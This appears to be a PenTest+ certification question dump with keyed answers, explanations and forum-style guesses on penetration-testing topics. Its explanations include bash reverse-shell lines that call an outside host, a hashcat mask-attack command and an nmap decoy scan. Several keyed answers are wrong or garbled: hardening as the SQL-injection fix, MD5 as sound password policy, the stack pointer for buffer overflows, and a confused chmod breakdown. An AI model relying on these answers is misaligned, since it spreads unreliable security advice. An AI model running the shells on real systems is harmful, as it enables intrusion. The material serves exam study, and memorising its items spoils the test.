Elicitation attack Explanation: I think the question needs to be read more carefully, "in hopes of the CEO logging in to obtain their credentials". Elicitation to extract meaningful information from a target... very broad verbiage here, never said specifically targeting the CEO, that would be whaling, which is not an option. They want to make a copy of the web mail portal and sends an email (assuming the whole company), in hopes the CEO logs on, they don't care about anyone else. This makes the attack broad so I would personally eliminate 'spear phishing".
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
Enable HTTP Strict Transport Security. Explanation: In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
Executive summary Explanation: In this scenario, the question states that the penetration tester is writing a report "that outlines the overall level of risk." Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in "layman's terms." A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime. Explanation: In this scenario, the client does not have the budget to immediately correct all of the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
HKEY_CURRENT_USER Explanation: If a tester has access to a Windows workstation or server, then they can use PowerSploit, which provides the toolkit needed to maintain persistence and to perform further reconnaissance. The testing will want to exploit the HKEY_CURRENT_USER registry hive. The HKEY_CURRENT_USER hive is meant to be available only to the currently logged on user. So, when a different Windows user logs onto the system, a different copy of the HKEY_CURRENT_USER registry hive is loaded. The HKEY_CURRENT_USER registry hive is saved locally as the file NTUSER.DAT or USER.DAT when a user logs off. This registry hive can be opened in Notepad, and the encrypted login ID and password can be easily located. If the user has a roaming profile, then the NTUSER .DAT file will be saved on every workstation the user logged onto.
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
HTTP POST method. Explanation: Forms in HTML can use either method="POST" or method="GET" (default) in the <form> element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, the parameters are not saved in browser history. GET is less secure compared to POST.
A penetration tester is reviewing the following output from a wireless sniffer: Which of the following can be extrapolated from the above information?
Hardware vendor Explanation: The question is reviewing the following output. We have the BSSID and we know we can find the vendor from that information. I would think the answer is A. I would go with A as well. The Basic Service Set Identifier (BSSID) is the MAC Address for the wireless access point. Using this information, it would be wise for the attacker to do a mac address lookup via google, to see who the manufacturer of the access point is. Searching a little further can also provide the attacker with default credentials for these access points. Hopefully, the attacker might find one of the access points that was left in a default status. I don't know; those are just my thoughts on the matter. :) By checking the first three octets of a MAC address and we can extrapolate the vendor.
Which of the following tools is used to perform a credential brute force attack?
Hydra Explanation: In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.
DRAG DROP -Instructions:Analyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.Select and Place:
I am not a coder so correct me if I am wrong. This is clearly a Python code because: Python uses "import" vs Ruby uses "require" Python uses "print" vs Ruby uses "puts" Python uses variables like "port=21" vs Ruby has different types of variables and if we were to use a variable starting with "$" (Global variables begin with $) we would need to create a class. (https://www.tutorialspoint.com/ruby/ruby_variables.htm) So I would still stick with the below: 1 - #!/usr/bin/python 2- ports = [21,22] 3- for port in ports: ... 4- run_scan(sys.argv[1], ports)
A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; doneWhich of the following BEST describes the result of running this command?
Live host identification Explanation: https://smallbusiness.chron.com/ping-ip-addresses-lan-68381.html ping - c -->You can set the number of times ping is run. By default, it runs until stopped (Linux)
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
MAC address of the gateway Explanation: ARP spoofing is a technique in which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker's Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.
A software development team recently migrated to new application software on the on-premises environment. Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM.Which of the following is MOST important for confirmation?
Misconfiguration Explanation: Actually I think it's D as the tester is replicating the same environment so he can pentest the vulnerabilities from the new application. CompTIA PenTest_ Certification Passport (Exam PT0-001) - Heather Linn "Application testing may also include evaluation of misconfigurations to the servers hosting the application. These misconfigurations may affect the confidentiality of the application data or allow testers to tamper with individual user sessions. Three examples of this type of vulnerability are directory traversal, file inclusion, and cookie manipulation." As per the exam objectives, the 3.4 application-based vulnerabilities has: Security misconfiguration: - Directory traversal - Cookie manipulation and 3.5 local host vulnerabilities has: - Unsecure service and protocol configurations So what vulnerabilities are we trying the replicate to the VM? If that is what the question is. From the new application software or from the on-premises environment? From this confusing question, I guess that the on-prem environment "never" had such an issue prior to this migration. As a result, I am assuming that the onboarding of this new application may have been misconfigured, and caused some security issues. I would say that the new service is an unsecured service, but that is something they SHOULD have checked out (SAST) prior to the migration. This is a tough one. I think I'll go with D - Misconfiguration
The following command is run on a Linux file system:chmod 4111 /usr/bin/sudoWhich of the following issues may be exploited now?
Misconfigured sudo Explanation: In this scenario, the command chmod 4111 /usr/bin/sudo will misconfigure sudo. Chmod is a command and system call that is used to change the access permissions of file system objects (files and directories). Chmod 4111 (chmod a+rwx, urw, g-rw, o-rw, ug+s, +t, g-s, -t) sets permissions so that (U)ser / owner can't read, can't write, and can execute. (G)roup can't read, can't write and can execute. (O)thers can't read, can't write, and can execute. sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. I don't always trust the Sybex book. But, now that I think about it, D might might sense. The question asks "Which of the following issues may be exploited now?" Just "Sticky bits" by itself is not an issue to be exploited.
During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.Which of the following would be the BEST target for continued exploitation efforts?
Operating system: Windows 8.1 Open ports: 445, 3389 Explanation: For those not familiar with CompTIA: CompTIA loves, loves, *LOVES* questions about ports. You find such questions on the A+, Net+, Sec+, Linux+, CSA+, and CASP, among others. Port - Service 23 - telnet 53 - DNS 161 - SNMP 445 - SMB 514 - Remote Shell 3389 - RDP/WBT - Windows Based Termnal 5900 - VNC/RFB - Virtual Network Computer Port 445 can be hijacked, and is vulnerable to many kinds of attacks. I would agree with you on this one. "Port 445 is vulnerable to attacks, exploits and malware". https://www.senki.org/operators-security-toolkit/filtering-exploitable-ports-and-minimizing-risk-to-and-from-your-customers/ https://www.grc.com/port_445.htm. Completing a pass-the-hash attack seems to usually involve port 445. Try searching "pass-the-hash port 445" without quotes. For example: "All you need is a password hash to a system that has SMB file sharing open (port 445)" http://colesec.inventedtheinternet.com/hacking-windows-passwords-with-pass-the-hash/
A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
Pass the hash attack Explanation: In this scenario, the tester is using the Metasploit PSEXEC module. Using Metasploit, a tester can exploit a system and perform a hash dump to extract the systems hashes. The tester can then use the PSEXEC module to pass the hash to another system on the network. The example shows how the SMBPASS option is set and the pass-the-hash attack executed, resulting in access to a remote system within the network. A pass-the-hash attack is an exploit in which a tester takes a hashed user credential and, without cracking it, reuses it to deceive an authentication system into creating a new authenticated session on the same network.
Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?
Penetration test findings can assist an attacker in compromising a system. Explanation: Confidentiality controls seek to prevent disclosure attacks. Even though confidentiality agreements (CAs) are legal documents that help to enforce confidential relationships between two parties, this question asks why it is important to maintain confidentiality of findings. If an attacker was to receive word of findings during a penetration test, they could use those to compromise your client's system.
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
Perform an HTTP downgrade attack. Explanation: A downgrade attack is a form of attack in which a tester forces a network channel to switch to a less secure or unprotected data transmission standard. Downgrading the protocol is one component of a man-in-the-middle type attack and is used to intercept encrypted traffic. Downgrade attacks work by causing the client and server to use a less-secure protocol. In this scenario, since you are trying to capture all unencrypted web traffic, you would want to implement an HTTP downgrade attack.
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
Perform system hardening. Explanation: System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following: Application hardening Operating system hardening Server hardening Database hardening Network hardening
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
Preparing a pretext Explanation: "Pretexting is another form of social engineering where attackers focus on creating a good pretext, or a fabricated scenario, that they use to try and steal their victims' personal information. In these types of attacks, the scammer usually says they need certain bits of information from their target to confirm their identity. In actuality, they steal that data and use it to commit identity theft or stage secondary attacks." https://www.tripwire.com/state-of-security/security-awareness/5-social-engineering-attacks-to-watch-out-for/
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
Principle of authority Explanation: Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker is using the social engineering principle of authority. They were hoping that by the CFO receiving an email from the CEO, there would be no questions asked and the transfer would take place. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
Promptly alert the client with details of the finding. Explanation: critical vunerability is a reason to stop pentest and call the client. In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.
The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describes what the command does?
Redirects a TTY to a remote system. Explanation: The command #bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Sends a shell to 192.168.0.1:80 You also need to setup a listner on 192.168.0.1 (nc -lvp 80) 'C' is the correct answer. This is a bash reverse shell. Check out Reverse Shell Cheat Sheet from Pentestmonkey: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
Stack pointer register Explanation: https://zero-day.io/buffer-overflow-introduction/ https://itandsecuritystuffs.wordpress.com/2014/03/18/understanding-buffer-overflows-attacks-part-1/ http://www.bitforestinfo.com/2017/12/buffer-overflow-exploitation-tutorial-what-is-registers-types-of-registers-cpu-memory-management-organistaion.html
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
Static analysis Explanation: Static code analysis is conducted by analyzing an application's source code. Obviously, this type of testing is usually performed only during a white box penetration test. Static code analysis does not involve actually running the program. Instead, it is focused on analyzing how the application is written. Static Code Analysis commonly refers to the running of Static Code Analysis tools that attempt to highlight possible vulnerabilities within 'static' (non-running) source code by using techniques such as Taint Analysis and Data Flow Analysis.
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
Static scan Explanation: "Static code analysis is conducted by analyzing an application's source code. Obviously, this type of testing is usually performed only during a white box penetration test. Static code analysis does not involve actually running the program. Instead, it is focused on analyzing how the application is written. Static Code Analysis commonly refers to the running of Static Code Analysis tools that attempt to highlight possible vulnerabilities within 'static' (non-running) source code by using techniques such as Taint Analysis and Data Flow Analysis." Static needs code analyzers, dynamic means you run the program and see what happens to debug
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
Stored XSS Explanation: Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user which might be malicious and then stores that input in a data store for later use.
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
Swagger Explanation: Swagger is an open specification for defining REST APIs. A Swagger document is the REST API equivalent of a WSDL document for a SOAP-based web service. The Swagger document specifies the list of resources that are available in the REST API and the operations that can be called on those resources. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a Swagger document provides testers with a good view of how the API works and thus how they can test it.
A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability?
Trivial; little effort is required to exploit this finding. Explanation: The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.
Which of the following is an example of a spear phishing attack?
Targeting an executive with an SMS attack OR Targeting a specific team with an email attack Explanation: Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Spear phishing is aimed at specific individuals rather than a broader group. SMS phishing (or smishing) is phishing via SMS messages. SMS stands for Short Message Service. It is a way to send and receive text messages or short emails with a cell phone. An SMS attack is an attempt to obtain personal information by tricking the individual with a text message or by getting them to go to a fake website and enter personal information. In this scenario, you want to target one particular individual rather than a group. Spear = specific team or person/ Whaling = C level or big boss. Spear phishing also can target individuals. Both A and B are equally correct. Sadly, Comptia has unfair questions all the time.
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is theBEST argument as to why the penetration tester's source IP addresses should be whitelisted?
Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS. Explanation: Whitelisting testers in intrusion prevention systems (IPSs), web application firewalls (WAFs), and other security devices will allow them to perform their tests without being blocked. For a white box test, this means that testers won't spend time waiting to be unblocked when security measures detect their efforts. Black box and red team tests are more likely to result in testers being blacklisted or blocked by security measures. In this scenario, the penetration tester should tell the client that testing should focus on the discovery of potential security issues through all in-scope systems and not just on determining the effectiveness of active defenses such as the IPS.
A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?
The bands and frequencies used by the client's devices Explanation: In this scenario, the penetration tester would need to receive the bands and frequencies used by the client's wireless devices to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, and knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?
The client has applied a hot fix without updating the version.
Which of the following excerpts would come from a corporate policy?
The corporate systems must store passwords using the MD5 hashing algorithm. Explanation: A company policy (corporate policy) is a documented set of guidelines, formulated after an analysis of all internal and external factors that can affect a firm's objectives, operations, and plans. It is created by the company's board of directors. Corporate policy lays down the company's response to known and knowable situations and circumstances. It also determines the formulation and implementation of strategy and directs and restricts the plans, decisions, and actions of the company's officers in achievement of its objectives. In this scenario, the corporate policy should be very detailed and specific; hence, the corporate systems must store passwords using the MD5 hashing algorithm.
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.The tester runs the following command:nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130Which of the following BEST describes why multiple IP addresses are specified?
The tester is trying to perform a more stealthy scan by including several bogus addresses. Explanation: https://www.armourinfosec.com/nmap-cheat-sheet/ https://svn.nmap.org/nmap/docs/nmap.usage.txt nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 -D <decoy1,decoy2[,ME],...> --> Cloak a scan with decoys https://www.cyberciti.biz/tips/nmap-hide-ipaddress-with-decoy-ideal-scan.html -sV --> Detect Version of the Running Services -O --> tells NMAP to attempt to guess the operating system of the machine it's scanning --max-rate <number>: Send packets no faster than <number> per second
Given the following Python script: Which of the following is where the output will go?
To the screen Explanation: There is not file to print to. No file is opened, or closed.https://www.pythonforbeginners.com/code-snippets-source-code/port-scanner-in-python/
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented. Each password may be used only once.Select and Place:
Zverlory zv3rl0ry Zverl0ry Zv3r!0ry Checked using passwordmeter.com for strength.
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 Explanation: A reverse shell opens a communication channel on a port and waits for incoming connections. The client's machine acts as a server and initiates a connection to the tester's machine. This is what is done by using the following: bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 Given the options, D is the best option. A and C will not work because they are using the <SOURCEIP> and not the <DESTINATIONIP>. Option B is not correct because it is using the improper syntax.
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
dsquery user -inactive 3 Explanation: C...try it yourself...21 days = 3 weeks. C is the correct answer. Ref: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc725702%28v%3dws.11%29 -inactive <NumberOfWeeks> Searches for users who have been inactive (stale) for at least the number of weeks that you specify. -inactive <NumberOfWeeks> --> Searches for users who have been inactive (stale) for at least the number of weeks that you specify.
A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?
hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a Explanation: I would go for C. https://laconicwolf.com/2018/09/29/hashcat-tutorial-the-basics-of-cracking-passwords-with-hashcat/ -m 5600 --> specifies NetNTLMv2 as the hash type -a 3 --> specifies a mask attack, hash.txt --> file containing the hashes ?a?a?a?a?a?a?a?a --> this particular mask will attempt to bruteforce an 8 character password where all characters can be uppercase, lowercase, digits and can have space, symbols, etc. https://www.4armed.com/blog/perform-mask-attack-hashcat/ https://hashcat.net/wiki/doku.php?id=hashcat https://hashcat.net/wiki/doku.php?id=mask_attack https://www.cyberpratibha.com/hashcat-tutorial-for-password-cracking/
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5.Which of the following commands will test if the VPN is available?
ike-scan -A -t 1 --sourceip=apoof_ip 100.170.60.5 Explanation: "ike-scan is a command-line IPSec VPN Scanner & Testing Tool for discovering, fingerprinting and testing IPsec VPN systems." https://www.darknet.org.uk/2008/11/ike-scan-ipsec-vpn-scanner-testing-tool/ https://docs.paloaltonetworks.com/pan-os/7-1/pan-os-admin/vpns/site-to-site-vpn-concepts/set-up-site-to-site-vpn/test-vpn-connectivity https://subscription.packtpub.com/book/networking_and_servers/9781787121829/1/ch01lvl1sec17/pentesting-vpn-s-ike-scan
DRAG DROP -A manager calls upon a tester to assist with diagnosing an issue within the following Python script:#!/usr/bin/pythons = "Administrator"The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.Select and Place:
nist nsrt imdA strat
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
nmap -p 22 -iL targets Explanation: -iL --> Scans a list of IP addresses, you can add options before / after. nmap -iL ip-addresses.txt -sL --> List Scan - simply list targets to scan -oG --> Output greppable - easy to grep nmap output -oA --> Output in the three major formats at once The -iL file_name command tells nmap to read the specified file and scan only those hosts listed in the file.